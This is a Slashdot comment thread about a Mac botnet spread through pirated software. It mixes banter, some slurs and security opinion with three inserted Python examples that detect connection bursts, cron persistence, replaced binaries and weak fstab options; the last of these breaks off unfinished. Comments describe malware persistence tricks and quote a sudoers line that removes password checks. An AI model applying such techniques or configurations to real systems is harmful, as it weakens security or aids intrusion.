Zombie Macs Launch DoS Attack
Cludge writes "ZDNet has a story (and several related articles) about how Symantec has discovered evidence of an all-Mac based botnet that is actively involved in a DOS attack. Apparently, security on the exploited Macs (call them iBots?) was compromised when unwary users bit-torrented pirated copies of iWork 09 and Photoshop CS4 that contained malware. From the article: 'They describe this as the "first real attempt to create a Mac botnet" and note that the zombie Macs are already being used for nefarious purposes.'"
... that somebody didn't do it the old fashion way and post that the website host said bad things about Steve Jobs?
"Common sense will be the death of us all"
the end of innocence for Apple users.
Don't they know that Macs are impregnable? All of the stories over the last decade about how Macs don't get viruses prove it.
... and laugh and laugh... Oh, we're Mac users - we don't need stuff like virus and malware checkers! Now, let the explanations begin about how this is a wonderful intuitive "feature" and not a flaw.
Whoever actually believes that is retarded. I have two software firewalls, a hardware firewall (router), anti-virus, anti-malware, and anti-spyware on my Mac, same as on my old PC. I didn't get infected on PC, and I'm sure as hell not going to get my Mac botnetted.
I always wondered when those pirated copies of software would become malware vectors. Maybe the quickest way to stop software piracy is through evil copies of legitimate software.
it just... BBRRRAAAIINNNNSSS
I find it amusing that in this case it appears the inability to run Photoshop on Linux is a good thing.
I'll subscribe to Slashdot when I see a month without a dupe, a typo, or an article the "editors" didn't read.
I use Mac, and I love it! Macs never get vi
NO CARRIER
Anybody want my mod points?
I don't understand why this is a story.
It's just another set of hackers with different equipment.
W4r3Z are for hackers!
Sig this!
But these iZombies have such cool eye-candy the Windoze and Linux could never catch up in the cool factor in a million years!
sed -e 's/Chuck Norris/Rajnikant/g' joke > fact
If a user is tricked into installing malware on a machine, the machine is infected with malware.
It's a shame people think Macs are somehow magically protected against viruses and other nasty computer stuff, merely by virtue of the manufacturer and operating system. It's probably more of a shame that Apple has, in the past at least, marketed Macs as being (more?) immune to viruses than PCs - something which is somewhat true, but only for statistical reasons.
It's like STDs - if you're careless and go sticking your junk everywhere without taking precautions, you'll probably catch something cruel, eventually.
So does this mean that Macs are finally Enterprise Ready?
From what we know so far, apparently the botnet was created by a trojan and does not spread.
I'm a Mac user who doesn't run applications downloaded from completely untrustworthy sources like pirate p2p networks and you're correct -- I don't need a virus or malware checker.
Mac: Hi, I'm a mac!
PC: Im a.. *cough* PC...
Mac: Oh, you must be sick? Well I can't get sick.
PC: really?
Mac: (whispers) "Nobody knows I got HIV"
PC: Ahhhh... I just got a cold
Mac: See! I don't even have a cold!
The obvious solution is to switch to Linux, because everyone knows it has no viruses and never will.
I SAID NEVER WILL.
Sounds like someone has their panties in a twist. You might forget that strict permission levels don't imply security when the person behind the keyboard is an idiot.
Om, nomnomnom...
You'll have to settle for vim then!
Man, I run Vista and I don't have any of that (built-ins are disabled). I only have virus scanning done on a weekly basis, and somehow despite not having forty pieces of software dedicated to second-guessing me I still don't have any viruses or malware.
Simplest thing anyone can do is train the thing between the chair and the keyboard.
Shut the FUCK UP!
Purposefully installing malicious software does not indicate a vulnerability. The user intentionally installed a piece of software that is doing exactly what it is designed to do.
There isn't an operating system on the planet that can protect you (or itself) from fraudulent user activity.
Platform advocacy is like choosing a favorite severely developmentally disabled child.
I'm a user who doesn't run applications downloaded from completely untrustworthy sources like pirate p2p networks and you're correct -- I don't need a virus or malware checker.
Fixed that for you.
There are shills on slashdot. Apparently, I'm one of them.
Hear hear!
If you do common sense things - like not running random software from the internet, keeping your machine patched, and turning off unnecessary services - you don't need anti-virus software running constantly.
The problem is, computers are widely owned by people who don't know about how to use them safely and often act as if they can't be bothered to learn.
Essentially, this makes it impervious to viruses. Even trojans are thwarted because smart users (Mac users) don't execute programs they don't know the origin of.
No computer system can withstand prolonged exposure to idiot owners. Macs are no exception. Your statement only confirms that :D
A botnet that just works.
The musings of just another geek and his junk.
All you Zombies Hide Your Faces.
Knowledge is how to play a game, intelligence is how to win, wisdom is knowing what game to play.
What do you mean, FUD? A trojan sure can run, and the article notes it IS running. There are no checks against trojans that run with user permissions. Heck, you can even schedule them to run at startup.. easy as pie!
If a user is an idiot, they can get malware on a Mac. Viruses are tough, but trojans are a cinch (I'm rusty, but could come up with a shell script in a few minutes and set +x on it and there you go). Linux would be just as easy.
So it's not FUD. Mac users who are not savvy can certainly get malware. If you know what you're doing, and stay away from P2P or other downloads you can't identify as "good," you're fairly safe (more so than unpatched Windows, for sure). But you're not immortal, and this article is proof of it. Even if it is from a fearmonger with self-interest like Symantec.
Sorry, how does conficker spread again?
As a poster mentioned above, it requires the user to manually install the trojan.
What I'd be interested to see is how OSX/Vista/XP/Linux stack up in terms of "security when user is not a moron" tests, actually. Take an average Slashdotter's machine: patched up to date, probably using Firefox, won't feel the need to install the latest smiley pack from evilhax0rz.com/CuteSmileysLOL, more likely to be running as a limited-permission user day to day, and so on. Are any of those machines likely to be compromised at all? If so by what vector? It'd pretty much have to be a worm or stealthy malware - both of which are (I would guess) going to raise flags with the savvy user on any modern OS by forcing a permission box to pop up.
this makes it impervious to viruses
Methinks thou dost protest too much.
It doesn't matter if "it" is impervious. Users are not. If they want to install and run a poison app. Not if they are so anxious to pirate commercial applications that they're willing to hold their breath and hope that the nice guy in Romania who is "sharing" his kindly cracked copy of CS4 would never, ever do anything naughty. Not if they're just stupid app users who bought a Mac because everyone promised them they'd never have to ever ever worry about such things, and that false sense of security makes them willing to run anything that's handed to them, because, gosh, nothing can hurt them and their magic Mac.
Don't disappoint your bird dog. Go to the range.
How would they even know what to learn in the first place?
And rightfully so. If the damn thing needs that much care and feeding, it is defective and should be returned!
I know this will be laughed at, but I'll post it anyway:
I've been running Vista on several computers since around 4 months after it launched, and on some of them I *do* run p2p software. I have anti-viruses on all of them, and not *once* have I ever detected anything.
If you keep windows up to date, and you _know-how-to-use-a-computer_, you're not in any more danger than Mac users.
Don't download/run executables from untrustworthy sources, don't download *any* executables from p2p networks, and don't use IE.
Apart from that, it's the usual: Don't open attachments, be aware of phishing, and don't parade around warez sites (at least not with scripting turned on).
Now go ahead, get it out of your system...
"ZOMG! He's using VISTA! BAN HIM!!"
Entomologically speaking, the spider is not a bug, it's a feature.
I really doubt this particular trojan could form much of a DDOS attack. It is poorly hidden and pretty simple to find and dispose of, and its presence was found quickly and was quite well known.
Amen. I ran a windows computer of my own for four years and I ditched the anti-virus within about a month. If you're intelligent about your computer use you really don't have to worry about much at all. Fun little trick, I changed my main directory from c:\ to k:\ and that seemed to immediately and drastically decrease the chance of malware/spyware/etc. It seems they hardcode a lot of the directory information and not having any drive with c:\ worked quite nicely. I run a mac now and I still don't use AV software, no point.
"Educate the mind but never at the expense of the soul."~Blessed Basil Moreau
Seriously? A download, installed, and password prompting program is a vulnerability?
That must mean that apple's Remote Desktop is a huge vulnerability. Giving the attacker complete control of the victims system, and the ability to execute remote code! Oh the horror! Oh the humanity!
MAC users should be rejoicing around the world! What this actually means is that hackers are noticing MACs are gaining in population and they see profit in targeting them. What's going to fall next, Rome?
I'm curious - how do you know you've not got a virus if you don't run an AV scan to check?
Take that, PC gamers!
Assuming the worm/malware is stupid enough to raise said flags. The goal is to avoid that kind of thing and use exciting local privilege escalation exploits.
Your argument is incredibly flawed because I know just as many idiots (in a computer sense) who run Macs as PCs... mainly for the reason that they're "hip" or "look cool/cute/shiny".
I downloaded them but I made sure not to pick the versions with the malware first ..
It's about time Macs were brought into the fray of malicious software. As a Mac Fanboy, I'm tired of feeling left out.
As the saying goes, "There is no such thing as a free lunch".
If you don't know where it came from, then don't download it.
There is no such thing as an absolutely secure system since the user can override the security features.
Another saying, "Intel inside, idiot outside"
Photoshop cs2 and cs3 work with wine =)
As a lot of people have probably mentioned already, how is it Apple/Mac OS X's fault that malware was installed on the computer? The malware is a program after all, which was given administrator privileges when the pirated iWork was installed. It didn't exploit anything; the user installed it manually. The same thing could happen on Linux/BSD for pirated programs that are binary-only. Same goes for any MSOffice for Windows from TPB.
No, the funny part is that the users who torrented and installed pirated copies of iWork 09 and Photoshop CS4 got exactly what they deserved. Instant karma.
Any sect, cult, or religion will legislate its creed into law if it acquires the political power to do so.
Witchcraft, demons, and bad karma.
I don't believe in time. It's a grand conspiracy designed to sell watches.
macinfags just got shit on.
It's a shame that the level of intelligence and knowledge of the posters to Slashdot seems to still be in decline.
I would think that anyone who wants to use this "revelation" as some kind of troll against OSX would at least be able to differentiate between a virus and a trojan.
There's a decent chance there will be some kind of unpatched OSX vuln that will be exploited ala what you see on a Windows machine, but until then you should just stew in silence and wait for your opportunity to post your "See OSX is no better than Windows" messages and then you won't look like such ignorant fools.
If you can install software on a computer, you can install software that is malware as well. I doubt anyone can fault Apple for allowing end users to install software that they choose to install.
Doesn't require that the user is an idiot, just that they are not computer-savvy. Which is the exact audience Macs are marketed to.
Human beings are part of the security equation. If your security model requires more expertise than your typical user actually has, then it's a crappy security model.
Most mac users aren't very smart, of course there are exceptions (I run a mac your insensitive clod!)
I know well where this torrent would come from, TPB or demonoid, and I'm willing to use plenty of torrents from both sites.
This is simply unproven for all the reasons outlined in your post. Until you see *UNIX widely deployed as a "desktop" OS, all claims that UNIX is inherently more secure than Windows are nothing but untested theories.
Which is exactly the point we were trying to make about Vista SP2, in a previous thread. So what's good for the goose is good for the gander.
At least *nix variants have been around longer. And I can say from my own experience that since switching to *nix, my uptime and productivity have greatly increased.
I'm sure though that symantec will find a botnet on linux as soon as they have a product that works on linux desktop systems.
I'm a Mac user and I'm looking around for some virus detection software. Do any other Mac users out there have any positive experiences of the current crop of malware/virus software available for the mac? Any recommendations? Anything to stay clear of?
All my experience with PC virus software has been pretty negative, background processes that gobble up entire cores and half your memory, reducing the machine to a gibbering wreak. I'd like to run something I can pretty much ignore (other than making sure that it is up to date). Even AVG, which used to be fantastic, is now a terrible resource hog.
While it is still the case that macs are much less likely to get hit by malware, and there are currently no known examples of a self-propagating worm that doesn't require a stupidity/carelessness on the part of the user (that I'm aware of), things are getting a little more dangerous. It would be nice to be prepared, hubris is a dangerous thing.
Paul Leader
So, you can infect OS/X computers after manipulating a program and tricking a user into voluntarily installing the malware!
I am surprised! Although of course, it would be more impressive if it was like in windows 98 in which connecting to the internet rendered you vulnerable. Or how about a more recent example in which you just had to plug a USB drive? Sorry but it still sounds very easy to fill a windows computer with viruses in comparison with this.
Copyright infringement is "piracy" in the same way DRM is "consumer rape"
I have been free of any anti virus and any viruses since Vista's RC release (now on win7)
I keep mine at E:\
Heres to agreeing =]
The blogger who reported this perhaps didn't realize that he had just outed himself as a warez user.
"It's the height of ridiculousness to say for those 9 lines you get hundreds of millions."
How do you know you have a virus when the first thing any virus or malware worth its salt does is disable the virus scanner? Virus scanners do nothing but slow your system down in exchange for giving you a very, very false sense of security. I would never trust a virus scanner to tell me I had a virus. If your system got 0wned, you are well and fucked; you can't trust anything on it, even (and especially) the virus scanner.
No sir, I've never run a virus program and don't plan to in the future. The best "virus scanner" is knowing what shit should be running on your computer and what shit shouldn't. If you see any suspicious process, consider it a red flag. Oh yeah, and if "explorer.exe" is listening on several ports, has 4 dozen TCP/IP sessions open, and is checking random POP3 mailboxes, you might have a problem too. A virus scanner wouldn't have detected any of it though, because the virus scanner would have been 0wned too.
Absolutely, which is why it would make an interesting comparison. I have no idea what the actual state of malware (or unpatched permission escalation vulnerabilities) is at the moment, but I'd think that's exactly the kind of information the smart/geeky user would want to know about for their own system.
As far as I'm aware conficker relies on an issue that's long since been patched. This Mac botnet relies on users volunteering their password to any old bit of software with dubious provenance. I'm reasonably confident that my systems are, therefore, safe from these issues. </tempting fate>
Maybe, just maybe, we'd find out it's not often worth the effort, or indeed even possible, for the malware authors to stealth their applications so the smart users won't see them when there are plenty of other users out there to prey on instead.
Is there such a thing as a "mac user" and a "windows user" anymore?
Anyway, you "windows users" get a good laugh off, meanwhile us in the 21st century will continue to use our computers whether they have macos, windows or linux.
If you do common sense things - like not running random software from the internet, keeping your machine patched, and turning off unnecessary services - you don't need anti-virus software running constantly.
you don't need anti-virus software running constantly
running constantly
constantly
Does that help answer your question? From the GGPP:
I only have virus scanning done on a weekly basis
In short, he does scan, just not every second via a memory resident application.
Oh, was that my outside voice?
For what it's worth, and from what I've read about this, it seems like a virus checker wouldn't have identified the problem. A firewall would have, though. The malware was an infinite looping PHP script that opened and closed 100 connections to the target site via CURL. The thing that surprised me is that apparently that means that Macs come out-of-the-box with a working web server and PHP installation, enabled even. Although I guess a web server isn't required in this case.. it was a command line call to php with inline code to execute ("php -r "). That probably doesn't require Apache to be running.
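The comment above argues that the tell-tale sign was network behaviour (100 connections from one process to one target), not a file signature. As an added example that is not from the article or any commenter, here is a host-side check that groups netstat-style connection lines by process and remote host and flags any peer above a threshold; the sample output, the process names/PIDs and the threshold of 50 are all constructed for the demo.

```python
"""Flag processes holding an unusual number of connections to one remote host.

Input format assumed (constructed for this example, in the spirit of `netstat -tnp`):
    proto local_addr:port foreign_addr:port state pid/program
"""
import re
from collections import Counter

# One connection line; sockets without a pid ("-") and header lines do not match.
LINE_RE = re.compile(r"^(tcp|udp)6?\s+(\S+)\s+(\S+)\s+(\S+)\s+(\d+)/(\S+)")


def parse_netstat(text):
    """Yield (program, pid, remote_host) for every parseable connection line."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # header, blank line, or socket with no owning pid
        _proto, _local, foreign, _state, pid, program = m.groups()
        host = foreign.rsplit(":", 1)[0]  # drop the remote port, keep the host
        yield program, int(pid), host


def find_connection_bursts(text, threshold=50):
    """Return [(program, pid, host, count)] for peers with >= threshold connections, largest first."""
    counts = Counter(parse_netstat(text))
    hits = [(prog, pid, host, n) for (prog, pid, host), n in counts.items() if n >= threshold]
    return sorted(hits, key=lambda h: -h[3])


def constructed_sample():
    """Build fake netstat output: one php process with 100 sockets to a single host, plus benign noise."""
    lines = ["Proto Local Address Foreign Address State PID/Program name"]
    for port in range(51000, 51100):
        lines.append(f"tcp 192.0.2.10:{port} 198.51.100.7:80 ESTABLISHED 4242/php")
    lines.append("tcp 192.0.2.10:48211 203.0.113.5:443 ESTABLISHED 1337/Safari")
    lines.append("tcp 192.0.2.10:48212 203.0.113.9:443 ESTABLISHED 1337/Safari")
    lines.append("tcp 192.0.2.10:22 198.51.100.20:50022 ESTABLISHED -")  # no pid: ignored
    return "\n".join(lines)


if __name__ == "__main__":
    for prog, pid, host, n in find_connection_bursts(constructed_sample()):
        print(f"{prog}[{pid}] has {n} connections to {host}")
```

A loop that opens and closes connections quickly can look small in any single snapshot, so in practice the check is run repeatedly and the counts accumulated across samples.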
"Two things are infinite: the universe and human stupidity; and I'm not sure about the universe." Albert Einstein. "You make your choices and you take your chances," P.T. Barnum.
I find it interesting that the compromised macs have been used as zombies for a DoS attack. It doesn't seem like the smartest use of newly compromised systems, as such a use of a system can be so intense in terms of memory and bandwidth usage that it should be fairly easy for even a novice user to notice that something is awry.
I'm rather surprised that the people behind this didn't go for something less obvious, like spam propagation.
Damn_registrars has no butt-hole. Damn_registrars has no use for a butt-hole.
You don't need to stealth them that much really. The malware that runs on Linux uses the same techniques as the ones on windows. Yes, Linux does have malware of its own--usually in the form of some IRC bullshit for either botnet control or warez. Typically malware on either system will do one or more of the following:
1) Add themselves into Cron/Task Scheduler to ensure they get re-installed.
2) Use process names that look familiar-ish (though I've seen a couple on Windows that are just random filenames, which I suspect might be to make them un-googleable)
3) Start up as a daemon/service
4) If they are any good, replace system executables with their own. Like replace ssh with their own version that sniffs your passwords or replace "explorer.exe" with some fancy new version that sends out spam.
5) Try to live in both hidden and "obvious" directories. On linux, I've seen shit get tucked into /dev or something like that *and* tuck into some random long hidden directory. On Windows... same thing. Bury yourself in C:\windows\system32 and also live in "C:\Program Files\C0rel Draw".
6) I did mention cron/task scheduler, right? Always watch for that... you'll forget and wonder why shit is still running on your machine.
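The list above names three things a defender can check mechanically: cron entries, executables living under scratch or hidden paths, and replaced system binaries. As an added example that is not from any commenter, here is a small audit in Python covering all three; the crontab text, the fake "ssh" file in a temp directory and the known-good hash table are constructed for the demo, and the list of suspect path prefixes is an assumption, not a standard.

```python
"""Audit cron entries and known binaries for the persistence tricks named above."""
import hashlib
import os
import tempfile

# Assumed set of places a legitimate cron command should not be launched from.
SUSPECT_PREFIXES = ("/dev/", "/tmp/", "/var/tmp/")


def cron_commands(crontab_text):
    """Yield the command part of each active crontab line (5 time fields or @reboot-style)."""
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment, or VAR=value environment line
        if line.startswith("@"):
            fields = line.split(None, 1)   # "@reboot <command>"
            want = 2
        else:
            fields = line.split(None, 5)   # "m h dom mon dow <command>"
            want = 6
        if len(fields) == want:
            yield fields[-1]


def suspicious_cron_entries(crontab_text):
    """Return commands whose executable sits under a suspect prefix or inside a hidden directory."""
    hits = []
    for cmd in cron_commands(crontab_text):
        exe = cmd.split()[0]
        parts = exe.split("/")
        hidden = any(p.startswith(".") and p not in (".", "..") for p in parts)
        if exe.startswith(SUSPECT_PREFIXES) or hidden:
            hits.append(cmd)
    return hits


def sha256_file(path):
    """Hash a file in chunks so large binaries do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def modified_binaries(expected):
    """Return paths that are missing or whose hash differs from `expected` ({path: sha256})."""
    return [p for p, digest in expected.items()
            if not os.path.exists(p) or sha256_file(p) != digest]


def demo():
    """Constructed data: a crontab with two planted entries and an 'ssh' that gets replaced."""
    crontab = """\
MAILTO=root
# nightly backup, legitimate
0 2 * * * /usr/local/bin/backup.sh
*/5 * * * * /dev/.hid/updater -q
@reboot /home/user/.cache/.x/loader
30 4 * * 1 /usr/bin/updatedb
"""
    with tempfile.TemporaryDirectory() as d:
        ssh = os.path.join(d, "ssh")
        with open(ssh, "wb") as f:
            f.write(b"original-binary")
        known_good = {ssh: sha256_file(ssh)}   # baseline taken before the "replacement"
        with open(ssh, "wb") as f:             # simulate technique 4: swapped-out ssh
            f.write(b"trojaned-binary")
        return suspicious_cron_entries(crontab), modified_binaries(known_good)


if __name__ == "__main__":
    cron_hits, changed = demo()
    print("suspicious cron entries:", cron_hits)
    print("modified binaries:", changed)
```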
ZOMG! He's using VISTA! BAN HIM!!
Oh, um, yeah. So am I. Same story - no AV tools on my personal box (XP64), only on the kids' and wife's PCs. I don't trust the kids at all from that perspective ... And the firewall/IDS shows no unexpected activity.
May I be the first to laugh...
Not if you're a Linux user.
Mac users aren't the only ones living in glass houses, here. There's something to be learned for everybody here. If Mac user humility here is your highest concern with this article then you are turning into what you despise.
"I like to lick butts!" by MobileTatsu-NJG (#32700246) (Score:5, Informative)
Apache is built in, but turned off by default on OS X. A user has to turn on "Web Sharing" for apache to start.
OS X does default the firewall to off; Apple may want to reconsider this at some point, just as a general precaution.
Nor does it fix anything when you have a critical vulnerability in the operating system... http://www.h-online.com/news/Root-exploit-for-Mac-OS-X--/110968
Debian and RHEL use pgp signatures on packages by default and they check if the signature is good.
There are problems with both of them at the moment, but there are teams actively working on the problem. (and have been for some time now.)
Microsoft is trying to do this with windows drivers by demanding that they are signed. But that is not really working due to various issues.
Most *N*X distributions have used md5 sums to verify packages but that has been proven to be subvertable so there is a movement afoot to create proper pgp infrastructure.
It is amazing how many commercial apps for RHEL have as step one of the install process: Disable SELinux (Zimbra, Oracle)
Linux distributors are aware of the problem and are trying with limited success to implement solutions.
Debian seems the furthest along on creating the infrastructure, while Redhat seems to have the best tools.
So, while you could probably do something similar on Linux the preventative steps are being taken.
Work bio at MMWD
I suspect that this botnet has been created by a geek that is sick to death of uneducated Mac fanboyism, and in a small way, I have respect for that.
No, it wasn't. This botnet was created by a computer criminal who saw an opportunity to capitalize on people who install pirated software either because they are too clueless to know the risks or because they have deluded themselves into thinking it is a riskless act. The lesson we can all learn from this is the following:
"If you download pirated software off the internet and install it on your computer you run the risk of installing along with it carefully crafted malware that your security software or whatever other precautions you are taking may not be able to protect you against."
Note that this basic lesson is true on all incarnations of Mac OS X, Windows, Linux or any other network enabled operating system you can download pirated software for.
Now please crawl back under your rock and learn to write better trolls...
Only to idiots, are orders laws.
-- Henning von Tresckow
Something about Internet connections and USB storage devices, as far as I know. Also, from what I've read on the Internet, these stories of people still getting infected with Conficker invariably involve unpatched Windows computers.
Sorry, can you please remind me how this relates to the user a few posts up who isn't computer-retarded?
Let q be a radix > 1. I am in ur base-q, killing 10 d00ds.
OS X may be harder to compromise but it was only a matter of time before Macs were infected. And as Macs gain market share more Macs will be compromised. I don't think anything, any OS, can ever be completely secure.
Faclon
Should there be a Law?
Don't you mean "iDiot"?
*ducks*
-Noc
forgot to close that b tag, sorry about that :-(
%homedrive%
Sounds like someone has their panties in a twist. You might forget that strict permission levels don't imply security when the person behind the keyboard is an idiot.
Honestly speaking, I can understand his panty twistedness. I'm suffering from it, too. For the last several years here on Slashdot I have heard all about how Windows' popularity causing more viruses was a myth and the magical thing about Linux was that it was 'more' secure because of its permissions structure and yadda yadda yadda. But now we get to Apple, who frankly has a lot of people here looking to put down, and suddenly the reverse is 'true'.
I'm not an Apple fan, nor am I a Microsoft or *nix hater or anything like that. (Frankly I cannot even cast stones about the behaviour here as I have contributed to it on other topics.) I just feel like I'm listening to Rush Limbaugh sometimes. It's all about the agenda, not about facts or even best practices. It is frustrating. Bullshit is still bullshit even if the majority agrees with it.
I seem to recall this was why Bruce S. switched from investigating "pure geek" attacks to the social ones.
My first Journal Entry ever, in 8 years! http://slashdot.org/journal/365947/aphelion-scifi-fantasy-horror-poetry-webzine
Is there a utility out there that would do this one simple change across the board and fix all the links that needed it?
That and what's so strict about OSX's permission levels?
The default user has permission to overwrite Safari, iTunes, and everything inside /Applications.
The problem might be partly that users install legitimate software the same way they do it with software of questionable origin. That is true in Windows and appears to be true on MacOS too.
If you however use signed central repositories to install trusted software instead, you will have a very different user experience if you try to install some random piece of software from the Internet or from p2p networks, e.g. installing software via Add/Remove Programs vs. downloading it manually, making it executable and running.
It won't guarantee safety for a determined user, but a different user experience would sure scare many newbies off installing such malware.
I am a PC. c:
that a lot of "pirated" Bit Torrent software contains malware. Not just the Windows versions, but the Mac and Linux and BSD Unix versions as well.
When you download pirated software you take a risk that it contains a trojan.
I've even seen PDF files that had HTML exploits in them that got detected by antivirus. Read the comments on most Bit Torrent web sites and the users will complain that it contains a virus. You don't have to download it to test it, the people who already downloaded it will give feedback that it contains a trojan or malware.
When you download pirated software you are taking a big chance, it isn't worth it when a majority of things are infected. That is why I look towards Free and Open Source Software as alternatives to commercial products.
Remember, Slashdot does not have a -1 disagree moderation, and no, troll, flamebait, and overrated are not substitutes.
iBot, same malware at an outrageous price
Antivirus Protection
load "$",8,1
Still, it will be a matter of a different user's experience in Linux. You may make malware installs proceed the same way as normal software in Windows and MacOS, but it is much harder with a system in which users routinely use signed repositories to install most of their software.
In other words, your success will be very limited because the experience of installing malware will be very different to normal software.
There isn't an operating system on the planet that can protect you (or itself) from fraudulent user activity.
The NSA and DoD would disagree. The whole Common Criteria system is designed to mitigate fraudulent user activity.
Of course it's silly to think that just because something got an EAL 37++ rating means it's "secure", but the whole point in going for a rating is thinking about how things can be broken.
Correct me if I'm wrong, but a trojan doesn't qualify as a "security issue" on the part of the OS.
You're wrong. Anything that compromises the system is a security issue for the OS. Now, I'm not assigning blame or being critical or any of that pejorative stuff. I'm simply pointing out that this is the business of the OS, and it's a security issue.
Looking forward, we'll someday have an OS that efficiently detects malware behavior, or enforces good behavior in some other way. Trojans are not a "game over" scenario for the OS.
It's related to the botnet brute forcing from last week.
http://it.slashdot.org/comments.pl?sid=1196525&cid=27551519
http://it.slashdot.org/comments.pl?sid=1196525&cid=27552175
Well, I am not a MAC user, but for this problem they do not need a virus detector or malware checker as these would not detect the problem. The software was after all installed by the user at a level of privilege that allowed it to do all that it was doing.
The problem here is not in the OS, as others have pointed out pretty well any OS would allow this, the problem is "PEBKAC", ie the user/admin has installed software that has features that they don't know about. Realistically there is actually no way of knowing everything that a software package does, unless you have the source plus sufficient time and knowledge to figure it all out. Practically this means being a bit careful about where you get your software from. It seems these users were not very careful.
The fact of the matter is that the Mac OS (BSD, doncha know) has very strict user permission levels. This gives it a strong protection mechanism against unwanted programs running without the user knowing.
Guess what, so does Vista.
Even trojans are thwarted because smart users (Mac users) don't execute programs they don't know the origin of.
Well, apparently, there are enough not-so-smart Mac users to form a botnet, in case you bothered to read TFS...
This really just goes to show that, in most cases, the attack vector for virus/trojan/whatever infection is not technical but social - something that has long been the case on Windows due to its ubiquity, but now we can welcome OS X to the family as well. It doesn't matter how good your security is if your user is clueless, and will consistently answer "Yes" to any "Do you want me to install a botnet client on your box, send your CCs to the author, and download some child porn for the fun of it?" prompts.
I think OSX was a unix based system.
There are plenty of ways to get admin if it is needed/useful. One is simply to sneak in with a software package. Various software does need admin to install and even if it doesn't is the user going to know that? Probably not, they'll give it admin. Another is to setup and watch silently and when the user enters their admin password, capture it. Then of course there's always the possibility of using a local privilege escalation exploit.
You are completely correct that it is not real security. This is made even more so by the fact that most users simply view it as a hoop to jump through. They don't ask themselves "Should this actually need admin?" They just hand it out whenever asked. To the extent it does any good at all, the users have to actually treat it as more tha a hoop and very few do.
If apps can be installed at a given level, malicious apps can be installed at that same level. There is no way to say "Only good apps have permission." Further, what would it accomplish in terms of damage control? Ok so you saved your OS. Great. Is that really what you care about? I dunno about you, but I can replace my OS and drivers in about an hour. Apps take longer, that could take a couple days to reinstall and configure all those. However my data is what really matters. It is the only thing that'd really be a problem to lose.
So suppose all apps could install as the user, or as a slightly privileged "app" level. What's that gain you? You get an evil virus that then wipes out everything it has permission to, which is all your apps and all your data. You still have the OS but what did that buy you? An hour saved in reinstall time? Are you REALLY going to trust that there isn't something deeper in the OS or would you reinstall anyhow for safety?
Compartmentalization of damage works on a multi user system for sure. If a user gets a virus, better that it hoses only their stuff, not everyone's. However the current system of "apps get installed as root" works well for that. Users have access to their own data only, no system data, no apps, no other user data. However on a single user system it's moot. Since there's only one user, protecting them is all that matters. Protecting the OS gets you fuck all.
Guys guys guys... you're missing the point. It doesn't matter if the attack was social or security based. The fact is it is a Mac based botnet. That's it. No double standard here, just reporting that a Macintosh based botnet is up to no good. The bottom line is that security is up to the user. I could go %sudo ALL=NOPASSWD: ALL in my /etc/sudoers and security goes right out the window. It's all in control of the user. People are (as a collective) just not that smart. There can never be a secure system as long as there are users of the system.
Which (no pun intended) is steadily becoming an Apple.
Apples are becoming the low hanging fruit? Windows has OS X beat on that score.
Falcon
Should there be a Law?
Any time the fact that administrator doesn't really protect you and so on was pointed out they said things like "That's all theoretical," or "Well there hasn't been any attacks." Ya well ok, now it's not because there has. Now you need to shut your yap about how invincible your OS is and start taking some proactive security precautions.
Many Mac users strike me as people living in a gated community. Their community is separate and exclusive and has low crime, and thus the appearance of security. They see their nice security guard at the gate and think "I'm safe here." So they then proceed to leave their doors unlocked, have no alarm, no safe for valuables and so on. They espouse how safe they are living in this nice community when really they are nothing of the sort, it is all an illusion. Then something like this happens.
I have always advocated, for any OS, proactive security and defense in depth. That means doing things to prevent problems before they happen. Don't get a virus scanner because you've been hit with a virus, get one because you haven't and never want to be. Also, don't rely on a single layer of defense. Don't say "Well I don't run as root/admin so I'm safe." No, that is A layer of security not THE layer. Run as a deprivileged user, and have a virus scanner, and a system firewall, and a network firewall (NAT works ok too), and keep your system patched and so on. Do multiple things to keep yourself secure.
If you have a deep defense and you are proactive about security, you'll likely stay secure. If you rely on a single, flimsy layer of security and the fact that "I've never been hacked before," you are probably going to have problems, sooner or later.
In the case of Macs, it'll only get worse if they keep getting more popular. The more there are, the better a target they are, and also the more people who will know enough to make evil shit for them.
welcome to the jungle OSX
"You can kill the revolutionary, but you can't kill the revolution."-- Fred Hampton
As a long-time Mac (and PC) user myself, I've been known to give someone a "simplified version" of the truth, telling them "you won't have any virus or spyware problems on a Mac".
It's not that I'm some clueless user who doesn't know better. It's that I have a pretty good idea of what the individual does with and expects from their computer. Judging by that, and knowing they're not a very "technical" user to begin with, I know that practically speaking, they really aren't going to need to worry about infections on their Mac.
(So far, just about all of the trojan horses and viruses people mentioned for OS X involved downloading files of unknown origins, or running something you received in an unsolicited email. When you have a user who is already scared to open any email at all from people he/she doesn't know, they're hopefully in good shape there. They're certainly not savvy enough to fire up bittorrent and start seeking out pirated software, either.)
OS X does default the firewall off, Apple may want to reconsider this at some point, just as a general precaution.
They should have considered that years ago. Microsoft beat them to that realization!
It depends on the variant. The first used a buffer overflow in NetBIOS, for which there was a critical patch about two weeks before it appeared. Those that had a decent firewall were not affected even if unpatched.
Then later variants used AutoRun, those users that either disable that or don't put suspicious media into their computers were not affected.
Then later variants also tried to spread over writable shares and even did dictionary attacks. Those that had reasonable permissions, decent passwords, or paid attention to unusually slow network performance were unaffected or knew to wipe and reinstall.
So basically if you were not a moron computer user and did any reasonable subset of safe computer precautions you have no problem with conficker even without AV software in the mix.
By auto-attacking people who don't install OS updates.
This space for rent.
nice reality check
The truth is that a Mac is less likely to be targeted because it's a minority operating system.
I've never understood this assumption. It seems contradictory to say the minority is less likely to be targeted when IIS servers get popped a lot more than Apache when Apache is more widely distributed.
While Apache and IIS have 46.35% and 29.47% market shares respectively it could be that IIS is cracked more because it's less secure.
Don't forget that those running linux also have appropriate mount options set in fstab, such as noexec, nodev on /home and /tmp and /usr is set to read-only once things are installed.
Mod me up/Mod me down: I wont frown as I've no crown
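The mount options mentioned in the comment above (noexec and nodev on /home and /tmp, /usr read-only) are easy to forget about once a box is installed, so here is an audit that checks an fstab against that list. This is an added example for this thread, not anything from a distribution or from the commenter; the two fstab files are constructed, the policy table is mine (nosuid is my addition to the commenter's list), and the script only parses text, it does not touch the running system.

```python
"""Check an fstab for the mount hardening described in the comment above:
noexec,nodev (plus nosuid, my addition) on the writable user/temp
filesystems and a read-only /usr. Added example; sample data is constructed.
"""

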